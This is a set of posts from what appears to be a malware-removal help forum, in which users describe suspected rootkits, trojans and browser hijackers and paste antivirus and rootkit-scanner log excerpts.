  9. I am pretty positive I have a rootkit. It's a quiet and crafty sort; from the beginning there were no obvious signs of infection, there wasn't any slowing or memory leaking, no unusual traffic noted. I felt like something was off, but I couldn't pinpoint what until I got the first warning message from MBAM 3.0.6 Premium (see Exploit Blocking below). Now I notice that all my desktop icons are rearranged on relog and suddenly there is a bit of dead space at the bottom where I can no longer move any icons, though that's kind of the least of my worries. Sometimes the screen sort of freezes, almost like a screenshot, but then it clears up again right away. I'm running Windows 10 Home Premium, x64, on an Asus X756UXM. Please see all the notes below and txt files. Please note that things might be a little out of order from how I actually scanned things, because this started almost a week ago and I don't remember that far back. I believe the initial infection came from a popup/pop under (can't recall which, sorry!) at http:// www (dot) nowvideo (dot) sx/video/11bb079eff255 while using Chrome. I run AdBlock Plus, Ghostery, and some script blocker thingie, and have all my many browsers configured to block popups, and I never have any issues on any other sites, but this one managed to get around all that. I threw everything I could think of at this but I really just feel like I'm chasing it from one corner to another. Any help would be thoroughly appreciated. MBAM: * Initial error message that an exploit was blocked in Powershell (see txt file) * Scans Clean - All Scans * Starts up as normal, except Web Protection is shut off * On first load, Web Protection can be re-enabled * At some point, Web Protection with return to off, and Exploit Protection goes with it * Exploit Protection can be re-enabled, but it will switch off again * On attempting to re-enable Web Protection, it will forever say "Starting..." until next reboot ~~~ MBAR: * Scans clean ~~~ Avast: * Scans clean ~~~ TrendMicro Housecall: * Scans clean ~~~ GMER: * Found the following: Service C:\WINDOWS\system32\drivers\WdBoot.sys (*** hidden *** ) [BOOT] WdBoot <-- ROOTKIT !!! Service C:\WINDOWS\system32\drivers\WdFilter.sys (*** hidden *** ) [BOOT] WdFilter <-- ROOTKIT !!! Service C:\Program Files (x86)\Windows Defender\MsMpEng.exe (*** hidden ***) [AUTO] WinDefend <-- ROOTKIT !!! * Attempted deletion (through GMER) of all three, but WdBoot failed. ~~~ aswMBR: * Ran after GMER. The service below popped up, but aswMBR was unable to fix the issue (see full log). 23:05:02.343 Service WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys **LOCKED** * Subsequent attempts to run aswMBR result in BSOD for the reason "Page fault in non-paged area" and then forced restart. ~~~ JRT: * Nothing to report ~~~ HitmanPro: * Found buckets of cookies in all browsers, including Internet Explorer and Edge which I NEVER use. All cookies were deleted. This was the initial confirmation something was up. ~~~ rKill: * A couple of issues popped up, nothing glaring... See txt. ~~~ ADW Cleaner: * No issues found ~~~ FRST: * See txt ~~~ RootKitRemover (McAffee): * Scanned Clean ~~~ TDSSKiller: * Scanned Clean ~~~ Bootlog: * See Txt ~~~ MBAM Chameleon: * Ran from safe mode, all 13 or however many buttons failed identically. See txt. HijackThis 2-14-17.log MBAM - Exploit Blocked.txt Notes.txt Rkill 2-13-17.txt aswMBR 2-14-17.txt BootLog 2-17-17.txt Chameleon Fail 2-15-17.txt FRST 2-14-17.txt GMER 2-15-17.log
  10. Hello My name is Devon. Yesterday, when I started up my computer, a lot of error messages were coming up from various programs being unable to start. I restarted my system with a bit of suspicion, and all seemed well until the Chromium browser was installed without my doing anything. At this point, I did a quick scan with ESET NOD32 Antivirus4, which turned up nothing. However, a few minutes later, the live protection picked up on two things. I didn't think to take note of them at the time, but one was a variant of some malware being detected in a change of the cmd.exe in C:\Windows\SysWOW64. I made an ESET SysRescue disc, and launched into the live cd, and did a deep scan from there, which turned up nothing. I then went into Safe Mode and looked for any suspicious files. I found and deleted Chromium from my user's AppData\Local, as well as ByteFence antimalware from Program Files (I had not ever heard of ByteFence, let alone installed it.). I am about to run scans and stuff with RogueKiller, Hitman Pro, Spybot S&D, Malwarebytes, and HerdProtect. I will attach those logs when I get them. In the meantime, is there anything anyone might be able to point me towards that could help? I'm going to start the scans and go bathe my dogs, so it will be about an hour before I'm back on the forums, and then probably a few more until I have any of the scan logs. Any help is much appreciated.
  11. so im 100% sure i have some sort of trojan or key logger on my pc but i cant find it anywhere, i currently use avast and its not picking up jack, ive looked at current processes running... nothing. i know its on here because ive had 2 game accounts with different emails and passwords hacked on the same day. not sure what else to include (let me know) but any help would be greatly appreciated.
  12. The http://searchinterneat-a.akamaihd.netmalware is hidden somewhere on my computer and Malwarebytes Premium does not find it. It seems to affect Chrome and Firefox, but not IE. It hijacks my home page. Can someone help, please? Addition.txtFRST.txt
  13. Hi I am exeriencing a huge dose of the startsear.info bug. Not quite sure how this has appeared on my laptop, however i am having massive difficulty trying to completely remove this from my IE and Chrome. Steps taken thus far, i have run a Malwarebytes scan Malwarebytes Anti-Malware and the below was the result www.malwarebytes.org Scan Date: 25/04/2014Scan Time: 10:32:28 PMLogfile: Administrator: Yes Version: 2.00.1.1004Malware Database: v2014.04.25.04Rootkit Database: v2014.03.27.01License: TrialMalware Protection: EnabledMalicious Website Protection: EnabledChameleon: Disabled OS: Windows 8.1CPU: x64File System: NTFSUser: vuggzy Scan Type: Threat ScanResult: CompletedObjects Scanned: 248954Time Elapsed: 14 min, 25 sec Memory: EnabledStartup: EnabledFilesystem: EnabledArchives: EnabledRootkits: DisabledShuriken: EnabledPUP: EnabledPUM: Enabled Processes: 0(No malicious items detected) Modules: 0(No malicious items detected) Registry Keys: 0(No malicious items detected) Registry Values: 1Backdoor.Agent.Gen, HKU\S-1-5-21-3607773301-3379652883-1464597939-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|SAVIOUR, C:\Users\vuggzy\AppData\Roaming\video.exe, , [e8a0c76781fad95d36b24b0cbe45827e] Registry Data: 0(No malicious items detected) Folders: 0(No malicious items detected) Files: 1Backdoor.Agent.Gen, C:\Users\vuggzy\AppData\Roaming\video.exe, , [e8a0c76781fad95d36b24b0cbe45827e], Physical Sectors: 0(No malicious items detected) (end) Regarding C:\Users\vuggzy\AppData\Roaming\video.exe detection, i have tried to delete this but it keeps re-appearing I have also tried standard default amendments to Chrome and IE settings however this does not remove my issue. I am not very computer savvy so please help!!! What should i do?? Cheersvuggzy
  14. I have a a trojan on my computer called trojan.bitminer. It hooks onto my svchost and makes it use up unreal CPU. It then stops my display driver from working and eventually crashes the computer. I have browsed other forums and several people have had my exact problem. They download malwarebytes which finds the trojan. My malwarebytes can not find trojan.bitmine even though it is there. Please help me with what I should do Thanks in advance!
  15. Hereby as small suggestion to improve MBAM PRO. When scheduling a scan I'm presented the great option to "preform (the) scheduled scan silently from system account". I really like it since it is good for the 'forget it'-part of 'set it and forget it'. I also like the idea behind the option to "run a flash scan after succesful update". A new database update is a good time to run a flash scan. What I don't like about it is that (when I enable it) it loads the MBAM GUI to show this scan when I'm in the middle of something. (Good for the 'set it'-part, not so much for the 'forget it'-part). However, I'm currently not able to combine these settings. So I'd like to see/have the option to "run a flash scan after succesful update" and "preform this scan silently from the system account". This way I can let MBAM scan when it's most effective without being interrupted. I hope I made my proposal clear and I'd love to see it in the next MBAM-version.
  16. Hi there, Attached is a log file from Rootkit Unhooker run on an XP Pro SP3 machine - at the bottom are TWO unknown/hidden drivers. I hope this is the correct place to post this - please let me know if the DDS log needs to be posted BEFORE anyone can help with this issue. If the DDS is required, I will run it as soon as I can and post the log. RkUnhooker report generator v0.7 ============================================== Rootkit Unhooker kernel version: 3.7.300.505 ============================================== Windows Major Version: 5 Windows Minor Version: 1 Windows Build Number: 2600 ============================================== >Drivers Driver: C:\WINDOWS\system32\DRIVERS\igxpmp32.sys Address: 0xB90D0000 Size: 6320128 bytes Driver: C:\WINDOWS\system32\drivers\RtkHDAud.sys Address: 0xA79D4000 Size: 6103040 bytes Driver: C:\WINDOWS\System32\igxpdx32.DLL Address: 0xBF322000 Size: 3518464 bytes Driver: C:\WINDOWS\System32\igxpdv32.DLL Address: 0xBF05E000 Size: 2899968 bytes Driver: C:\WINDOWS\system32\ntkrnlpa.exe Address: 0x804D7000 Size: 2154496 bytes Driver: PnpManager Address: 0x804D7000 Size: 2154496 bytes Driver: RAW Address: 0x804D7000 Size: 2154496 bytes Driver: WMIxWDM Address: 0x804D7000 Size: 2154496 bytes Driver: Win32k Address: 0xBF800000 Size: 1871872 bytes Driver: C:\WINDOWS\System32\win32k.sys Address: 0xBF800000 Size: 1871872 bytes Driver: Ntfs.sys Address: 0xB9DC6000 Size: 577536 bytes Driver: C:\WINDOWS\system32\DRIVERS\Wdf01000.sys Address: 0xA7711000 Size: 503808 bytes Driver: C:\WINDOWS\system32\DRIVERS\mrxsmb.sys Address: 0xA77B4000 Size: 458752 bytes Driver: mfehidk.sys Address: 0xB9E6A000 Size: 454656 bytes Driver: C:\WINDOWS\system32\DRIVERS\update.sys Address: 0xB8F0E000 Size: 385024 bytes Driver: C:\WINDOWS\system32\DRIVERS\tcpip.sys Address: 0xA78D4000 Size: 364544 bytes Driver: C:\WINDOWS\system32\DRIVERS\srv.sys Address: 0xA6918000 Size: 360448 bytes Driver: C:\WINDOWS\System32\ATMFD.DLL Address: 0xBF67D000 Size: 290816 bytes Driver: C:\WINDOWS\System32\Drivers\HTTP.sys Address: 0xA59FB000 Size: 266240 bytes Driver: C:\WINDOWS\System32\igxpgd32.dll Address: 0xBF024000 Size: 237568 bytes Driver: C:\WINDOWS\system32\DRIVERS\k57xp32.sys Address: 0xB905E000 Size: 221184 bytes Driver: C:\WINDOWS\system32\DRIVERS\rdpdr.sys Address: 0xB8F6C000 Size: 196608 bytes Driver: ACPI.sys Address: 0xB9F79000 Size: 188416 bytes Driver: C:\WINDOWS\system32\DRIVERS\mrxdav.sys Address: 0xA6A60000 Size: 184320 bytes Driver: NDIS.sys Address: 0xB9D99000 Size: 184320 bytes Driver: C:\WINDOWS\system32\drivers\mfeavfk.sys Address: 0xB8FC4000 Size: 176128 bytes Driver: C:\WINDOWS\system32\DRIVERS\rdbss.sys Address: 0xA7824000 Size: 176128 bytes Driver: C:\WINDOWS\system32\DRIVERS\HDAudBus.sys Address: 0xB9094000 Size: 163840 bytes Driver: C:\WINDOWS\system32\DRIVERS\netbt.sys Address: 0xA7871000 Size: 163840 bytes Driver: dmio.sys Address: 0xB9F23000 Size: 155648 bytes Driver: C:\WINDOWS\system32\DRIVERS\ipnat.sys Address: 0xA7899000 Size: 155648 bytes Driver: C:\WINDOWS\system32\drivers\portcls.sys Address: 0xA79B0000 Size: 147456 bytes Driver: C:\WINDOWS\system32\DRIVERS\USBPORT.SYS Address: 0xB903A000 Size: 147456 bytes Driver: C:\WINDOWS\system32\DRIVERS\ks.sys Address: 0xB9017000 Size: 143360 bytes Driver: C:\WINDOWS\System32\Drivers\RDPWD.SYS Address: 0xA5708000 Size: 143360 bytes Driver: C:\WINDOWS\System32\drivers\afd.sys Address: 0xA784F000 Size: 139264 bytes Driver: ACPI_HAL Address: 0x806E5000 Size: 134528 bytes Driver: C:\WINDOWS\system32\hal.dll Address: 0x806E5000 Size: 134528 bytes Driver: fltMgr.sys Address: 0xB9EEB000 Size: 131072 bytes Driver: ftdisk.sys Address: 0xB9F49000 Size: 126976 bytes Driver: C:\WINDOWS\system32\drivers\mfeapfk.sys Address: 0xA55CA000 Size: 114688 bytes Driver: Mup.sys Address: 0xB9D7F000 Size: 106496 bytes Driver: atapi.sys Address: 0xB9F0B000 Size: 98304 bytes Driver: C:\WINDOWS\System32\Drivers\dump_atapi.sys Address: 0xA76F9000 Size: 98304 bytes Driver: KSecDD.sys Address: 0xB9E53000 Size: 94208 bytes Driver: C:\WINDOWS\system32\DRIVERS\ndiswan.sys Address: 0xB9000000 Size: 94208 bytes Driver: C:\WINDOWS\system32\drivers\mfetdi2k.sys Address: 0xA78BF000 Size: 86016 bytes Driver: C:\WINDOWS\system32\drivers\wdmaud.sys Address: 0xA6ADB000 Size: 86016 bytes Driver: C:\WINDOWS\system32\DRIVERS\VIDEOPRT.SYS Address: 0xB90BC000 Size: 81920 bytes Driver: C:\WINDOWS\system32\DRIVERS\ipsec.sys Address: 0xA792D000 Size: 77824 bytes Driver: C:\WINDOWS\System32\drivers\dxg.sys Address: 0xBF000000 Size: 73728 bytes Driver: C:\WINDOWS\System32\igxprd32.dll Address: 0xBF012000 Size: 73728 bytes Driver: sr.sys Address: 0xB9ED9000 Size: 73728 bytes Driver: pci.sys Address: 0xB9F68000 Size: 69632 bytes Driver: C:\WINDOWS\system32\DRIVERS\psched.sys Address: 0xB8FEF000 Size: 69632 bytes Driver: C:\WINDOWS\System32\Drivers\Cdfs.SYS Address: 0xBA2B8000 Size: 65536 bytes Driver: C:\WINDOWS\system32\DRIVERS\cdrom.sys Address: 0xB96E7000 Size: 65536 bytes Driver: C:\WINDOWS\system32\DRIVERS\serial.sys Address: 0xB9707000 Size: 65536 bytes Driver: C:\WINDOWS\system32\drivers\drmk.sys Address: 0xBA1A8000 Size: 61440 bytes Driver: C:\WINDOWS\system32\DRIVERS\redbook.sys Address: 0xB96D7000 Size: 61440 bytes Driver: C:\WINDOWS\system32\drivers\sysaudio.sys Address: 0xA6C10000 Size: 61440 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbhub.sys Address: 0xBA178000 Size: 61440 bytes Driver: C:\WINDOWS\system32\DRIVERS\CLASSPNP.SYS Address: 0xBA0E8000 Size: 53248 bytes Driver: C:\WINDOWS\system32\drivers\mfebopk.sys Address: 0xA5616000 Size: 53248 bytes Driver: C:\WINDOWS\system32\DRIVERS\rasl2tp.sys Address: 0xBA128000 Size: 53248 bytes Driver: VolSnap.sys Address: 0xBA0C8000 Size: 53248 bytes Driver: C:\WINDOWS\system32\DRIVERS\WDFLDR.SYS Address: 0xBA218000 Size: 53248 bytes Driver: C:\WINDOWS\system32\drivers\mfetdik.sys Address: 0xBA1D8000 Size: 49152 bytes Driver: C:\WINDOWS\system32\DRIVERS\raspptp.sys Address: 0xBA148000 Size: 49152 bytes Driver: C:\WINDOWS\System32\Drivers\Fips.SYS Address: 0xBA1F8000 Size: 45056 bytes Driver: C:\WINDOWS\system32\DRIVERS\imapi.sys Address: 0xB96F7000 Size: 45056 bytes Driver: MountMgr.sys Address: 0xBA0B8000 Size: 45056 bytes Driver: C:\WINDOWS\system32\DRIVERS\raspppoe.sys Address: 0xBA138000 Size: 45056 bytes Driver: isapnp.sys Address: 0xBA0A8000 Size: 40960 bytes Driver: C:\WINDOWS\system32\drivers\LMIRfsDriver.sys Address: 0xA6C40000 Size: 40960 bytes Driver: C:\WINDOWS\System32\Drivers\NDProxy.SYS Address: 0xBA188000 Size: 40960 bytes Driver: C:\WINDOWS\system32\DRIVERS\termdd.sys Address: 0xBA168000 Size: 40960 bytes Driver: disk.sys Address: 0xBA0D8000 Size: 36864 bytes Driver: C:\WINDOWS\system32\DRIVERS\HIDCLASS.SYS Address: 0xBA208000 Size: 36864 bytes Driver: C:\WINDOWS\system32\DRIVERS\intelppm.sys Address: 0xB9717000 Size: 36864 bytes Driver: C:\WINDOWS\system32\DRIVERS\msgpc.sys Address: 0xBA158000 Size: 36864 bytes Driver: C:\WINDOWS\system32\DRIVERS\netbios.sys Address: 0xBA1E8000 Size: 36864 bytes Driver: C:\WINDOWS\system32\DRIVERS\wanarp.sys Address: 0xBA2A8000 Size: 36864 bytes Driver: C:\WINDOWS\System32\Drivers\Npfs.SYS Address: 0xBA468000 Size: 32768 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbccgp.sys Address: 0xBA378000 Size: 32768 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbehci.sys Address: 0xBA408000 Size: 32768 bytes Driver: C:\WINDOWS\system32\DRIVERS\HIDPARSE.SYS Address: 0xBA450000 Size: 28672 bytes Driver: C:\WINDOWS\system32\DRIVERS\NuidFltr.sys Address: 0xBA480000 Size: 28672 bytes Driver: C:\WINDOWS\system32\DRIVERS\PCIIDEX.SYS Address: 0xBA328000 Size: 28672 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbprint.sys Address: 0xBA470000 Size: 28672 bytes Driver: C:\WINDOWS\system32\DRIVERS\kbdclass.sys Address: 0xBA428000 Size: 24576 bytes Driver: C:\WINDOWS\system32\DRIVERS\mouclass.sys Address: 0xBA430000 Size: 24576 bytes Driver: C:\WINDOWS\System32\Drivers\rkhdrv40.SYS Address: 0xBA4A0000 Size: 24576 bytes Driver: C:\WINDOWS\System32\Drivers\TDTCP.SYS Address: 0xBA4A8000 Size: 24576 bytes Driver: C:\WINDOWS\system32\DRIVERS\usbuhci.sys Address: 0xBA400000 Size: 24576 bytes Driver: C:\WINDOWS\System32\drivers\vga.sys Address: 0xBA458000 Size: 24576 bytes Driver: C:\WINDOWS\System32\Drivers\Msfs.SYS Address: 0xBA460000 Size: 20480 bytes Driver: PartMgr.sys Address: 0xBA330000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\ptilink.sys Address: 0xBA418000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\raspti.sys Address: 0xBA420000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\TDI.SYS Address: 0xBA410000 Size: 20480 bytes Driver: C:\WINDOWS\System32\watchdog.sys Address: 0xBA388000 Size: 20480 bytes Driver: C:\WINDOWS\system32\DRIVERS\kbdhid.sys Address: 0xA779C000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\mssmbios.sys Address: 0xB9D3B000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\ndisuio.sys Address: 0xA75E5000 Size: 16384 bytes Driver: C:\WINDOWS\system32\DRIVERS\serenum.sys Address: 0xBA588000 Size: 16384 bytes Driver: C:\WINDOWS\system32\BOOTVID.dll Address: 0xBA4B8000 Size: 12288 bytes Driver: C:\WINDOWS\System32\drivers\Dxapi.sys Address: 0xA7794000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\hidusb.sys Address: 0xB8236000 Size: 12288 bytes Driver: C:\WINDOWS\System32\Drivers\i2omgmt.SYS Address: 0xB8FB0000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\mouhid.sys Address: 0xB822E000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\ndistapi.sys Address: 0xBA58C000 Size: 12288 bytes Driver: C:\WINDOWS\system32\DRIVERS\rasacd.sys Address: 0xB8FA8000 Size: 12288 bytes Driver: 00000018 Address: 0xBA5A8000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\Beep.SYS Address: 0xBA5DA000 Size: 8192 bytes Driver: dmload.sys Address: 0xBA5AE000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\dump_WMILIB.SYS Address: 0xBA642000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\Fs_Rec.SYS Address: 0xBA5D8000 Size: 8192 bytes Driver: intelide.sys Address: 0xBA5AC000 Size: 8192 bytes Driver: C:\WINDOWS\system32\KDCOM.DLL Address: 0xBA5A8000 Size: 8192 bytes Driver: C:\WINDOWS\System32\Drivers\mnmdd.SYS Address: 0xBA5DC000 Size: 8192 bytes Driver: C:\Program Files\LogMeIn\x86\RaInfo.sys Address: 0xBA66E000 Size: 8192 bytes Driver: C:\WINDOWS\System32\DRIVERS\RDPCDD.sys Address: 0xBA5DE000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\swenum.sys Address: 0xBA5D2000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\USBD.SYS Address: 0xBA5D4000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\WMILIB.SYS Address: 0xBA5AA000 Size: 8192 bytes Driver: C:\WINDOWS\system32\DRIVERS\audstub.sys Address: 0xBA79F000 Size: 4096 bytes Driver: C:\WINDOWS\System32\drivers\dxgthk.sys Address: 0xBA707000 Size: 4096 bytes Driver: C:\WINDOWS\system32\DRIVERS\lmimirr.sys Address: 0xBA79E000 Size: 4096 bytes Driver: C:\WINDOWS\System32\Drivers\Null.SYS Address: 0xBA776000 Size: 4096 bytes Driver: pciide.sys Address: 0xBA670000 Size: 4096 bytes !!!!!!!!!!!Hidden driver: 00000056 Loaded from: Address: 0x8AA18053 Size: 4013 bytes ============================================== >Stealth Unknown page with executable code Address: 0x8AA1A58F Size: 2673 Unknown page with executable code Address: 0x8AA18053 Size: 4013
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.